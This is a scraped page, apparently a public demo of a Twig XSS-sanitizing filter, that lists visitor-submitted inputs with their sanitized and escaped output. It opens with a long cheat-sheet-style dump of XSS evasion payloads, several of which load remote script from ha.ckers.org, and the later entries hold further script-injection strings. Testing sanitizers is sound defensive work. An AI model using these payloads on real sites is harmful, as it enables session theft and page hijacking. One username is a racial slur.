aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> <<SCRIPT>alert("XSS");//<</SCRIPT> <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search <script>alert("hellox worldss")</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510 <script>alert("XSS");</script>&search=1 0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search <h1><font color=blue>hellox worldss</h1> <BODY ONLOAD=alert('hellox worldss')> <input onfocus=write(XSS) autofocus> <input onblur=write(XSS) autofocus><input autofocus> <body onscroll=alert(XSS)><br><br><br><br><br><br>...<br><br><br><br><input autofocus> <form><button formaction="javascript:alert(XSS)">lol <!--<img src="--><img src=x onerror=alert(XSS)//"> <![><img src="]><img src=x onerror=alert(XSS)//"> <style><img src="</style><img src=x onerror=alert(XSS)//"> <? foo="><script>alert(1)</script>"> <! foo="><script>alert(1)</script>"> </ foo="><script>alert(1)</script>"> <? foo="><x foo='?><script>alert(1)</script>'>"> <! foo="[[[Inception]]"><x foo="]foo><script>alert(1)</script>"> <% foo><x foo="%><script>alert(123)</script>"> <div style="font-family:'foo&#10;;color:red;';">LOL LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style> <script>({0:#0=alert/#0#/#0#(0)})</script> <svg xmlns="http://www.w3.org/2000/svg">LOL<script>alert(123)</script></svg> &lt;SCRIPT&gt;alert(/XSS/&#46;source)&lt;/SCRIPT&gt; \\";alert('XSS');// &lt;/TITLE&gt;&lt;SCRIPT&gt;alert(\"XSS\");&lt;/SCRIPT&gt; &lt;INPUT TYPE=\"IMAGE\" SRC=\"javascript&#058;alert('XSS');\"&gt; &lt;BODY BACKGROUND=\"javascript&#058;alert('XSS')\"&gt; &lt;BODY ONLOAD=alert('XSS')&gt; &lt;IMG DYNSRC=\"javascript&#058;alert('XSS')\"&gt; &lt;IMG LOWSRC=\"javascript&#058;alert('XSS')\"&gt; &lt;BGSOUND SRC=\"javascript&#058;alert('XSS');\"&gt; &lt;BR SIZE=\"&{alert('XSS')}\"&gt; &lt;LAYER SRC=\"http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\"&gt;&lt;/LAYER&gt; &lt;LINK REL=\"stylesheet\" HREF=\"javascript&#058;alert('XSS');\"&gt; &lt;LINK REL=\"stylesheet\" HREF=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;css\"&gt; &lt;STYLE&gt;@import'http&#58;//ha&#46;ckers&#46;org/xss&#46;css';&lt;/STYLE&gt; &lt;META HTTP-EQUIV=\"Link\" Content=\"&lt;http&#58;//ha&#46;ckers&#46;org/xss&#46;css&gt;; REL=stylesheet\"&gt; &lt;STYLE&gt;BODY{-moz-binding&#58;url(\"http&#58;//ha&#46;ckers&#46;org/xssmoz&#46;xml#xss\")}&lt;/STYLE&gt; &lt;XSS STYLE=\"behavior&#58; url(xss&#46;htc);\"&gt; &lt;STYLE&gt;li {list-style-image&#58; url(\"javascript&#058;alert('XSS')\");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS &lt;IMG SRC='vbscript&#058;msgbox(\"XSS\")'&gt; &lt;IMG SRC=\"mocha&#58;&#91;code&#93;\"&gt; &lt;IMG SRC=\"livescript&#058;&#91;code&#93;\"&gt; žscriptualert(EXSSE)ž/scriptu &lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript&#058;alert('XSS');\"&gt; &lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data&#58;text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\"&gt; &lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http&#58;//;URL=javascript&#058;alert('XSS');\" &lt;IFRAME SRC=\"javascript&#058;alert('XSS');\"&gt;&lt;/IFRAME&gt; &lt;FRAMESET&gt;&lt;FRAME SRC=\"javascript&#058;alert('XSS');\"&gt;&lt;/FRAMESET&gt; &lt;TABLE BACKGROUND=\"javascript&#058;alert('XSS')\"&gt; &lt;TABLE&gt;&lt;TD BACKGROUND=\"javascript&#058;alert('XSS')\"&gt; &lt;DIV STYLE=\"background-image&#58; url(javascript&#058;alert('XSS'))\"&gt; &lt;DIV STYLE=\"background-image&#58;\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028&#46;1027\0058&#46;1053\0053\0027\0029'\0029\"&gt; &lt;DIV STYLE=\"background-image&#58; url(javascript&#058;alert('XSS'))\"&gt; &lt;DIV STYLE=\"width&#58; expression(alert('XSS'));\"&gt; &lt;STYLE&gt;@im\port'\ja\vasc\ript&#58;alert(\"XSS\")';&lt;/STYLE&gt; &lt;IMG STYLE=\"xss&#58;expr/*XSS*/ession(alert('XSS'))\"&gt; &lt;XSS STYLE=\"xss&#58;expression(alert('XSS'))\"&gt; exp/*&lt;A STYLE='no\xss&#58;noxss(\"*//*\"); xss&#58;ex&#x2F;*XSS*//*/*/pression(alert(\"XSS\"))'&gt; &lt;STYLE TYPE=\"text/javascript\"&gt;alert('XSS');&lt;/STYLE&gt; &lt;STYLE&gt;&#46;XSS{background-image&#58;url(\"javascript&#058;alert('XSS')\");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt; &lt;STYLE type=\"text/css\"&gt;BODY{background&#58;url(\"javascript&#058;alert('XSS')\")}&lt;/STYLE&gt; &lt;!--&#91;if gte IE 4&#93;&gt; &lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt; &lt;!&#91;endif&#93;--&gt; &lt;BASE HREF=\"javascript&#058;alert('XSS');//\"&gt; &lt;OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\"&gt;&lt;/OBJECT&gt; &lt;OBJECT classid=clsid&#58;ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript&#058;alert('XSS')&gt;&lt;/OBJECT&gt; &lt;EMBED SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;swf\" AllowScriptAccess=\"always\"&gt;&lt;/EMBED&gt; &lt;EMBED SRC=\"data&#58;image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"&gt;&lt;/EMBED&gt; a=\"get\"; b=\"URL(\\"\"; c=\"javascript&#058;\"; d=\"alert('XSS');\\")\"; eval(a+b+c+d); &lt;HTML xmlns&#58;xss&gt;&lt;?import namespace=\"xss\" implementation=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;htc\"&gt;&lt;xss&#58;xss&gt;XSS&lt;/xss&#58;xss&gt;&lt;/HTML&gt; &lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;!&#91;CDATA&#91;&lt;IMG SRC=\"javas&#93;&#93;&gt;&lt;!&#91;CDATA&#91;cript&#58;alert('XSS');\"&gt;&#93;&#93;&gt; &lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt; &lt;XML ID=\"xss\"&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=\"javas&lt;!-- --&gt;cript&#58;alert('XSS')\"&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt; &lt;SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"&gt;&lt;/SPAN&gt; &lt;XML SRC=\"xsstest&#46;xml\" ID=I&gt;&lt;/XML&gt; &lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt; &lt;HTML&gt;&lt;BODY&gt; &lt;?xml&#58;namespace prefix=\"t\" ns=\"urn&#58;schemas-microsoft-com&#58;time\"&gt; &lt;?import namespace=\"t\" implementation=\"#default#time2\"&gt; &lt;t&#58;set attributeName=\"innerHTML\" to=\"XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;\"&gt; &lt;/BODY&gt;&lt;/HTML&gt; &lt;SCRIPT SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;jpg\"&gt;&lt;/SCRIPT&gt; &lt;!--#exec cmd=\"/bin/echo '&lt;SCR'\"--&gt;&lt;!--#exec cmd=\"/bin/echo 'IPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt;'\"--&gt; &lt;? echo('&lt;SCR)'; echo('IPT&gt;alert(\"XSS\")&lt;/SCRIPT&gt;'); ?&gt; &lt;IMG SRC=\"http&#58;//www&#46;thesiteyouareon&#46;com/somecommand&#46;php?somevariables=maliciouscode\"&gt; Redirect 302 /a&#46;jpg http&#58;//victimsite&#46;com/admin&#46;asp&deleteuser &lt;META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;\"&gt; &lt;HEAD&gt;&lt;META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- &lt;SCRIPT a=\"&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; &lt;SCRIPT =\"&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; &lt;SCRIPT a=\"&gt;\" '' SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; &lt;SCRIPT \"a='&gt;'\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; &lt;SCRIPT a=`&gt;` SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; &lt;SCRIPT a=\"&gt;'&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; &lt;SCRIPT&gt;document&#46;write(\"&lt;SCRI\");&lt;/SCRIPT&gt;PT SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; &lt;A HREF=\"http&#58;//66&#46;102&#46;7&#46;147/\"&gt;XSS&lt;/A&gt; &lt;A HREF=\"http&#58;//%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\"&gt;XSS&lt;/A&gt; &lt;A HREF=\"http&#58;//1113982867/\"&gt;XSS&lt;/A&gt; &lt;A HREF=\"http&#58;//0x42&#46;0x0000066&#46;0x7&#46;0x93/\"&gt;XSS&lt;/A&gt; &lt;A HREF=\"http&#58;//0102&#46;0146&#46;0007&#46;00000223/\"&gt;XSS&lt;/A&gt; &lt;A HREF=\"htt p&#58;//6 6&#46;000146&#46;0x7&#46;147/\"&gt;XSS&lt;/A&gt; &lt;A HREF=\"//www&#46;google&#46;com/\"&gt;XSS&lt;/A&gt; &lt;A HREF=\"//google\"&gt;XSS&lt;/A&gt; &lt;A HREF=\"http&#58;//ha&#46;ckers&#46;org@google\"&gt;XSS&lt;/A&gt; &lt;A HREF=\"http&#58;//google&#58;ha&#46;ckers&#46;org\"&gt;XSS&lt;/A&gt; &lt;A HREF=\"http&#58;//google&#46;com/\"&gt;XSS&lt;/A&gt; &lt;A HREF=\"http&#58;//www&#46;google&#46;com&#46;/\"&gt;XSS&lt;/A&gt; &lt;A HREF=\"javascript&#058;document&#46;location='http&#58;//www&#46;google&#46;com/'\"&gt;XSS&lt;/A&gt; &lt;A HREF=\"http&#58;//www&#46;gohttp&#58;//www&#46;google&#46;com/ogle&#46;com/\"&gt;XSS&lt;/A&gt;

keyword(s): pogis

description: pogis

by pogis | at 2020-04-07 20:37:37

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

ssdffsdf

result with twig: {{ xss.xss | escape }}:

ssdffsdf

keyword(s):

description:

by sdffsdf | at 2020-04-06 05:53:44

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

dab

result with twig: {{ xss.xss | escape }}:

dab

keyword(s):

description:

by dsa | at 2020-04-05 00:01:22

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

<3 Hello

result with twig: {{ xss.xss | escape }}:

<3 Hello

keyword(s):

description:

by I am | at 2020-04-02 17:42:39

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert('Akash');</script>

keyword(s): Bo

description: Bojeees

by Bojes | at 2020-04-02 09:14:10

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert(1)</script>

keyword(s):

description:

by | at 2020-04-02 09:11:50

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert(1)</script>

keyword(s): asdf

description: asdf

by asdf | at 2020-03-31 23:32:57

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert('hacked');</script>

keyword(s): ffggfgg bbbnnn

description: ejeiejijeiji

by asdd | at 2020-03-31 22:53:14

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert('hacked');</script>

keyword(s):

description:

by afdas | at 2020-03-31 14:03:02

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

测试

result with twig: {{ xss.xss | escape }}:

<a href="kek.html">测试</a>

keyword(s): 2

description: a

by 1 | at 2020-03-29 21:22:10

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

测试

result with twig: {{ xss.xss | escape }}:

<a href="javascript:alert('hello from address bar :)');">测试</a>

keyword(s): 123

description: 123

by 123 | at 2020-03-29 21:21:38

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

d

result with twig: {{ xss.xss | escape }}:

<a href="nigga"> d </a>

keyword(s): 123

description: 123

by nigga | at 2020-03-29 21:20:41

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

bold

result with twig: {{ xss.xss | escape }}:

<script>alert(1)</script><b>bold</bold>

keyword(s): hitut

description: bold

by samsul | at 2020-03-29 11:41:11

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

sdawdsd

result with twig: {{ xss.xss | escape }}:

<b>sdawdsd</b>

keyword(s): sadasd

description: halo

by asdsad | at 2020-03-29 11:31:41

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

<!--dassd-->

result with twig: {{ xss.xss | escape }}:

<!--dassd-->

keyword(s): assdad

description:

by dasdads | at 2020-03-24 21:46:31

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>

keyword(s): asdf

description: asdf

by asfsd | at 2020-03-24 07:59:27

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

测试

result with twig: {{ xss.xss | escape }}:

<a href="javascript:alert('hello from address bar :)');">测试</a>

keyword(s): sdf

description: 测试

by sdf | at 2020-03-23 05:17:04

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Test alert("HTML purifier test")

result with twig: {{ xss.xss | escape }}:

<span class="navbar-text">Test <script type="text/javascript">alert("HTML purifier test")</script></span>

keyword(s):

description:

by Kaishiyoku | at 2020-03-21 12:47:22

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

sdfc234rfcxzvkl;/'[] [p;/

result with twig: {{ xss.xss | escape }}:

sdfc234rfcxzvkl;/'[] [p;/

keyword(s):

description:

by a2:"/aa | at 2020-03-20 09:32:36

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

asdsa

result with twig: {{ xss.xss | escape }}:

asdsa

keyword(s): asd

description: asdasd

by aaa | at 2020-03-20 08:26:19

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

xss

result with twig: {{ xss.xss | escape }}:

xss

keyword(s): lkasd

description: lksjdf sldfkjlks dfjl sdkfjlk

by author | at 2020-03-16 10:28:08

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Zobaczymy

result with twig: {{ xss.xss | escape }}:

Zobaczymy

keyword(s): Koronawirus

description: Pandemia

by Mc | at 2020-03-15 09:08:37

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

{% xss_clean%}

result with twig: {{ xss.xss | escape }}:

{% xss_clean%}

keyword(s):

description:

by {% xss_clean%} | at 2020-03-14 06:27:13

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

s

result with twig: {{ xss.xss | escape }}:

s

keyword(s): sdds

description: dsds

by sssssssssssd | at 2020-03-13 07:09:45

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

">security

result with twig: {{ xss.xss | escape }}:

"><a href="data:text/html;base64,PHNjcmlwdD5wcm9tcHQoZG9jdW1lbnQuZG9tYWluKTwvc2NyaXB0Pg==">security</a>

keyword(s):

description:

by 123 | at 2020-03-12 02:38:06

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

">security

result with twig: {{ xss.xss | escape }}:

"><a href="data:text/html;base64,PHNjcmlwdD5wcm9tcHQoZG9jdW1lbnQuZG9tYWluKTwv c2NyaXB0Pg==">security</a>

keyword(s):

description:

by 123 | at 2020-03-12 02:37:09

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

;alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->'>=

result with twig: {{ xss.xss | escape }}:

;alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}

keyword(s): 213

description: 23

by 123 | at 2020-03-08 15:41:55

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

;alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->'>=

result with twig: {{ xss.xss | escape }}:

;alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}

keyword(s): qqqqqqqq

description: ;alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->'>=

by qqqqqqqqq | at 2020-03-06 09:36:36

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

;!--"=

result with twig: {{ xss.xss | escape }}:

;!--"<XSS>=

keyword(s): 222222222222

description: ;!--"<XSS>=

by 2222222 | at 2020-03-06 09:08:49

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert("asd");</script>

keyword(s): asd

description:

by asd | at 2020-03-03 07:14:52

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

wwww

result with twig: {{ xss.xss | escape }}:

wwww

keyword(s): asdd

description:

by aaaa | at 2020-03-03 07:14:22

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

keyword(s): asdf

description: asdf

by fasdf | at 2020-03-02 10:56:51

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

mC

result with twig: {{ xss.xss | escape }}:

mC

keyword(s): MC

description: Mc

by mc | at 2020-02-28 08:12:21

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert(1)</script>

keyword(s): ádasd

description: ádads

by ádasd | at 2020-02-28 03:10:01

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

p@y<"'p@y

result with twig: {{ xss.xss | escape }}:

p@y<"'p@y

keyword(s): aaa

description: aa

by aaa | at 2020-02-26 11:18:35

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

aaaa

result with twig: {{ xss.xss | escape }}:

aaaa

keyword(s): p@y<"'p@y

description: aa

by aaa | at 2020-02-26 11:18:34

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

aaaa

result with twig: {{ xss.xss | escape }}:

aaaa

keyword(s): aaa

description: aa

by p@y<"'p@y | at 2020-02-26 11:18:34

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

aaaa

result with twig: {{ xss.xss | escape }}:

aaaa

keyword(s): aaa

description: aa

by aaa | at 2020-02-26 11:11:24

BY LARS MOELLEKEN WITH HATE IN 2015